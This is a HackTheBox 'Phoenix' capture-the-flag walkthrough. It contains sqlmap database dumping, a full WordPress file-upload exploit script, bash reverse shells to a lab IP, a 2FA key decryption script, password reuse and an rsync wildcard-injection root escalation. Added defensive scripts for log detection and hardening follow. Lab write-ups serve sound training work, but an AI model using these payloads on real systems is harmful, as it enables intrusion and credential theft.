HackTheBox – Phoenix Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.149
Click on details -> click on Go to Blog.
https://phoenix.htb/?post_type=post
Now click on Forums.
https://phoenix.htb/forum/members/
┌──(root㉿kali)-[/home/kali/Downloads]
└─# wpscan --url https://phoenix.htb/ --disable-tls-checks --enumerate u
https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sqlmap --url "https://phoenix.htb/forum/?subscribe_topic=1" --level 3 --risk 3 --batch --dbms MySQL --dbs
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sqlmap --url "https://phoenix.htb/forum/?subscribe_topic=1" --level 3 --risk 3 --batch --dbms MySQL -D wordpress --tables
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sqlmap --url "https://phoenix.htb/forum/?subscribe_topic=1" --level 3 --risk 3 --batch --dbms MySQL -D wordpress -T wp_users --columns
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sqlmap --url "https://phoenix.htb/forum/?subscribe_topic=1" --level 3 --risk 3 --batch --dbms MySQL -D wordpress -T wp_users -C user_login,user_pass --dump
┌──(root㉿kali)-[/home/kali/Downloads]
└─# john hash --wordlist=rockyou.txt
We get the cred
superphoenix
https://www.exploit-db.com/raw/50287
Content:
# Exploit Title: WordPress Plugin Download From Files 1.48 – Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/download-from-files
# Date: 10/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/download-from-files/
# Version: <= 1.48
# Tested on: Ubuntu 20.04.1 LTS (x86)
import os.path
from os import path
import json
import requests
import sys

def print_banner():
    print("Download From Files <= 1.48 - Arbitrary File Upload")
    print("Author -> spacehen (www.github.com/spacehen)")

def print_usage():
    print("Usage: python3 exploit.py [target url] [php file]")
    print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri):
    # The plugin's upload endpoint answers an unauthenticated GET with the
    # string "Sikeres"; that reply is used as the vulnerability fingerprint.
    response = requests.get(uri, verify=False)
    raw = response.text
    if ("Sikeres" in raw):
        return True
    else:
        return False

def main():
    print_banner()
    if (len(sys.argv) != 3):
        print_usage()
        sys.exit(1)
    base = sys.argv[1]
    file_path = sys.argv[2]
    # Unauthenticated admin-ajax action exposed by the plugin
    ajax_action = 'download_from_files_617_fileupload'
    admin = '/wp-admin/admin-ajax.php'
    uri = base + admin + '?action=' + ajax_action
    check = vuln_check(uri)
    if (check == False):
        print("(*) Target not vulnerable!")
        sys.exit(1)
    if (path.isfile(file_path) == False):
        print("(*) Invalid file!")
        sys.exit(1)
    files = {'files[]': open(file_path)}
    # Upload parameters, including the allowed-extension list and the
    # destination directory, are supplied by the client.
    data = {
        "allowExt": "php4,phtml",
        "filesName": "files",
        "maxSize": "1000",
        "uploadDir": "."
    }
    print("Uploading Shell...")
    response = requests.post(uri, files=files, data=data, verify=False)
    file_name = path.basename(file_path)
    if ("ok" in response.text):
        print("Shell Uploaded!")
        if (base[-1] != '/'):
            base += '/'
        print(base + "wp-admin/" + file_name)
    else:
        print("Shell Upload Failed")
        sys.exit(1)

main()
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat shell.phtml
┌──(root㉿kali)-[/home/kali/Downloads]
└─# python3 exploit.py https://phoenix.htb/ shell.phtml
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 1234
┌──(root㉿kali)-[/home/kali/Downloads]
└─# curl -k https://phoenix.htb/wp-admin/shell.phtml --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.14.102/1234 0>&1"'
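Everything from the WPScan enumeration through the sqlmap probing of subscribe_topic, the unauthenticated admin-ajax upload and the first request to the dropped .phtml file passes through the web server's access log. The following script is an added example, not part of this walkthrough and not the box's own logs: the log lines are constructed to resemble those steps, and the four rules (scanner user agent, SQL tokens in a numeric parameter, the download_from_files_617_fileupload action, and script extensions that WordPress never serves itself) are assumptions about what a defender would watch for, using only values that appear on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined"-format lines modelled on the steps in this
# walkthrough; they are NOT real logs from the box.
SAMPLE_LOG = """\
10.10.14.102 - - [10/Sep/2021:12:00:01 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 812 "-" "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"
10.10.14.102 - - [10/Sep/2021:12:00:07 +0000] "GET /forum/?subscribe_topic=1%20AND%20SLEEP(5) HTTP/1.1" 200 5123 "-" "sqlmap/1.5.9#stable (https://sqlmap.org)"
192.0.2.5 - - [10/Sep/2021:12:00:09 +0000] "GET /forum/?subscribe_topic=42 HTTP/1.1" 200 5123 "https://phoenix.htb/forum/" "Mozilla/5.0"
10.10.14.102 - - [10/Sep/2021:12:01:30 +0000] "POST /wp-admin/admin-ajax.php?action=download_from_files_617_fileupload HTTP/1.1" 200 2 "-" "python-requests/2.26.0"
10.10.14.102 - - [10/Sep/2021:12:01:45 +0000] "POST /wp-admin/shell.phtml HTTP/1.1" 200 0 "-" "curl/7.79.1"
192.0.2.5 - - [10/Sep/2021:12:02:00 +0000] "GET /?post_type=post HTTP/1.1" 200 9321 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
SCANNER_UA = re.compile(r"sqlmap|wpscan", re.I)
# Crude SQLi indicators for a parameter that should only ever be an integer.
SQLI_TOKENS = re.compile(r"'|--|/\*|\b(?:union|select|sleep|benchmark)\b|\b(?:and|or)\b\s+\S+\s*=", re.I)
UPLOAD_ACTION = "download_from_files_617_fileupload"   # ajax action used by the exploit above
ODD_SCRIPT_EXT = (".php4", ".php5", ".phtml", ".phar")  # extensions the exploit's allowExt names

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Names of the rules one parsed log entry triggers (empty list = nothing of note)."""
    hits = []
    parts = urlsplit(entry["target"])
    path = parts.path.lower()
    query = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes once
    if SCANNER_UA.search(entry["ua"]):
        hits.append("scanner-user-agent")
    if any(SQLI_TOKENS.search(v) for values in query.values() for v in values):
        hits.append("sqli-pattern-in-query")
    if path.endswith("/wp-admin/admin-ajax.php") and UPLOAD_ACTION in query.get("action", []):
        hits.append("download-from-files-upload-action")
    if path.endswith(ODD_SCRIPT_EXT) or ("/wp-content/uploads/" in path and path.endswith(".php")):
        hits.append("unexpected-script-extension")
    return hits

def scan(log_text):
    """Return one finding per log line that triggers at least one rule."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append({"ip": entry["ip"], "target": entry["target"], "hits": hits})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["target"], ",".join(f["hits"]))
```

The upload-action rule is the high-confidence one: a POST to admin-ajax.php with that action from a session that never logged in has no legitimate explanation, and the subsequent request for a .phtml under /wp-admin/ confirms the outcome. The user-agent and SQL-token rules are noisier and are there to show how the earlier enumeration would have been visible before the upload happened.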
bash-5.0$ cd /opt
bash-5.0$ ls -lrt
bash-5.0$ cd wordpress
GET OTP KEY
We find there is a 2FA prompt on the /wp-admin login page, so we try to work out how to bypass it, or simply obtain the OTP key:
We find the encrypt and decrypt functions in the source of the miniOrange plugin at handler/twofa/two_fa_utility.php.
We can then grab the WordPress database login from the wp-config.php file:
bash-5.0$ cd ..
bash-5.0$ cat wp-config.php
Password: <++32%himself%FIRM%section%32++>
Then connect to MySQL to get more information:
bash-5.0$ script /dev/null -c bash
bash-5.0$ mysql -uwordpress -p
Enter password: <++32%himself%FIRM%section%32++>
mysql> show databases;
mysql> use wordpress;
mysql> select meta_value from wp_usermeta WHERE meta_key IN ('mo2f_gauth_key');
mysql> select meta_value from wp_usermeta WHERE meta_key IN ('mo2f_get_auth_rnd_string');
Then it is easy to write a small PHP decryption script to recover the key:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat epp.php
Content:
<?php
// Decrypts a miniOrange value: base64( IV || HMAC-SHA256 || AES-128-CBC ciphertext )
function decrypt_data($data, $key) {
    $c = base64_decode($data);
    $ivlen = openssl_cipher_iv_length($cipher = "AES-128-CBC");
    $iv = substr($c, 0, $ivlen);
    $hmac = substr($c, $ivlen, $sha2len = 32);
    $ciphertext_raw = substr($c, $ivlen + $sha2len);
    $original_plaintext = openssl_decrypt($ciphertext_raw, $cipher, $key, $options = OPENSSL_RAW_DATA, $iv);
    // The MAC is recomputed but never compared with $hmac; for recovering a value
    // whose key we already hold that does not matter.
    $calcmac = hash_hmac('sha256', $ciphertext_raw, $key, $as_binary = true);
    return $original_plaintext;
}
// First argument: mo2f_gauth_key from the database; second: mo2f_get_auth_rnd_string
echo decrypt_data("qGEPwI6RQBxF4aXM6PVuriofiwCH4mjc4ZjO3jWN5gDDX5MzLHTfDk3tRGK7vwkkTbAjoxNfqFeMjJZoSI5yPF25Hd5b8lSaF/Dpc6WMBTA=", "kHHxxX3f");
?>
┌──(root㉿kali)-[/home/kali/Downloads]
└─# php epp.php
bash-5.0$ cd /etc/pam.d
bash-5.0$ ls
We could completely bypass the 2FA by renaming the plugin directory under /opt/wordpress/, but that does not get us much further than we already are.
Instead, going back to SSH, we can look into bypassing the 2FA completely (for SSH this time, not WordPress). In the /etc/pam.d/ssh config we see a reference to an access file:
Read more about it:
https://manpages.ubuntu.com/manpages/bionic/man8/pam_google_authenticator.8.html
bash-5.0$ cat /etc/security/access-local.conf
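The access file is in pam_access(8) access.conf syntax, and what it does is decide, per source address, whether the module succeeds; per the walkthrough, connections from the trusted subnet are the ones that skip the second factor. As an added example (not code from the walkthrough, and the sample rules below are constructed since the page does not reproduce the real file), the script models pam_access's first-match evaluation so a defender can answer "which origins does this file let through?" without logging in from each of them. It handles ALL, a single address, a CIDR network and exact hostnames; EXCEPT clauses and the LOCAL keyword are deliberately left out.

```python
import ipaddress
from dataclasses import dataclass
from typing import List

# Constructed sample in access.conf syntax; NOT the box's real
# /etc/security/access-local.conf. Format: permission : users/groups : origins
SAMPLE_ACCESS_CONF = """\
# first matching line wins
+ : ALL : 10.11.12.0/24
- : ALL : ALL
"""

@dataclass
class Rule:
    permit: bool
    users: List[str]
    origins: List[str]

def parse_access_conf(text: str) -> List[Rule]:
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        perm, users, origins = (f.strip() for f in line.split(":", 2))
        rules.append(Rule(perm == "+", users.split(), origins.split()))
    return rules

def origin_matches(pattern: str, origin: str) -> bool:
    """ALL, a single address or a CIDR network; hostnames must match exactly."""
    if pattern == "ALL":
        return True
    try:
        addr = ipaddress.ip_address(origin)
    except ValueError:
        return pattern == origin          # origin is a hostname or tty, not an IP
    try:
        return addr in ipaddress.ip_network(pattern, strict=False)
    except ValueError:
        return False                      # pattern is a hostname, origin is an IP

def user_matches(pattern: str, user: str, groups=()) -> bool:
    if pattern == "ALL":
        return True
    if pattern.startswith("(") and pattern.endswith(")"):
        return pattern[1:-1] in groups    # "(group)" syntax
    return pattern == user

def access_allowed(rules: List[Rule], user: str, origin: str, groups=()) -> bool:
    """First matching rule decides. pam_access grants access when no rule
    matches at all, which is why a real file should end with '- : ALL : ALL'."""
    for r in rules:
        if any(user_matches(u, user, groups) for u in r.users) and \
           any(origin_matches(o, origin) for o in r.origins):
            return r.permit
    return True

RULES = parse_access_conf(SAMPLE_ACCESS_CONF)

if __name__ == "__main__":
    for src in ("10.11.12.13", "10.10.14.102"):
        verdict = "trusted by access file" if access_allowed(RULES, "editor", src) else "not trusted"
        print(src, verdict)
```

The point the model makes visible is that the trust is purely network-based: any process that can originate a connection from inside the allowed range, including a local shell on a host in that range, satisfies the rule for every user. A file that forgets the closing deny line is worse still, since an unmatched origin is granted rather than refused.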
We need to connect from an IP on the 10.11.2.13/24 subnet, which we cannot do from our own machine or locally from the other machine, so we use the ssh command from the wp_user shell:
We finally SSH over to the box, reusing editor's password:
bash-5.0$ ssh editor@10.11.12.13
Password: superphoenix
-bash-5.0$ id
-bash-5.0$ cd /home
-bash-5.0$ ls -lrt
-bash-5.0$ cd editor
-bash-5.0$ cat user.txt
-bash-5.0$ cd /dev/shm
-bash-5.0$ find /usr/local/bin/ -perm -o=x -type f 2>/dev/null
-bash-5.0$ file /usr/local/bin/cron.sh.x
https://gtfobins.github.io/gtfobins/rsync/
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 443
-bash-5.0$ cd /backups
-bash-5.0$ file /usr/local/bin/cron.sh.x
-bash-5.0$ cd /usr/local/bin
-bash-5.0$ ./cron.sh.x
And in another session, pspy shows the cron job's hits.
-bash-5.0$ echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.102/443 0>&1' > test.sh; touch -- '-e bash test.sh'
-bash-5.0$ ls -la
After 3 minutes we get the root shell.
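The root shell comes from a cron job expanding an unquoted wildcard in a directory other users can write to, so that a file name beginning with a dash is handed to rsync as an option rather than as a file. As an added example (not code from the walkthrough), the script below is what a defender can run against such a directory before, or as part of, the job: it models what a bare `*` passes to the program, flags the names a GNU-style option parser would consume as options, and shows the hardened `./*` expansion under which the same names are harmless. The directory layout in `demo()` is constructed.

```python
import os
import tempfile

def glob_argv(names):
    """Approximates what an unquoted `*` hands to a program: every non-hidden
    name in the directory, sorted, with nothing in front of it."""
    return sorted(n for n in names if not n.startswith("."))

def option_like(argv):
    """Arguments a GNU getopt-style parser reads as options instead of file
    operands. Everything after a literal '--' is always an operand."""
    flagged = []
    for arg in argv:
        if arg == "--":
            break
        if arg.startswith("-") and arg != "-":
            flagged.append(arg)
    return flagged

def hardened_argv(names):
    """Hardened expansion: `./*` pins every name to a path, so a name such as
    '-e bash test.sh' can no longer be parsed as an option."""
    return ["./" + n for n in glob_argv(names)]

def audit_directory(path):
    """Report which entries would become options under a bare `*`, and the
    argument vector the job should use instead."""
    names = os.listdir(path)
    return {"risky": option_like(glob_argv(names)),
            "safe_argv": hardened_argv(names)}

def demo():
    # Constructed directory layout mimicking a writable directory that a
    # scheduled backup job globs over (the walkthrough's test.sh trick).
    with tempfile.TemporaryDirectory() as d:
        for name in ("report.txt", "test.sh", "-e bash test.sh"):
            open(os.path.join(d, name), "w").close()
        return audit_directory(d)

if __name__ == "__main__":
    print(demo())
```

Two remediations follow directly from the output: the job should expand `./*` (or place `--` before the glob) so names stay operands, and the directory it reads should not be writable by accounts other than the one that runs the job. Running `audit_directory` from the job itself and refusing to continue when `risky` is non-empty gives a cheap guard until the script is fixed.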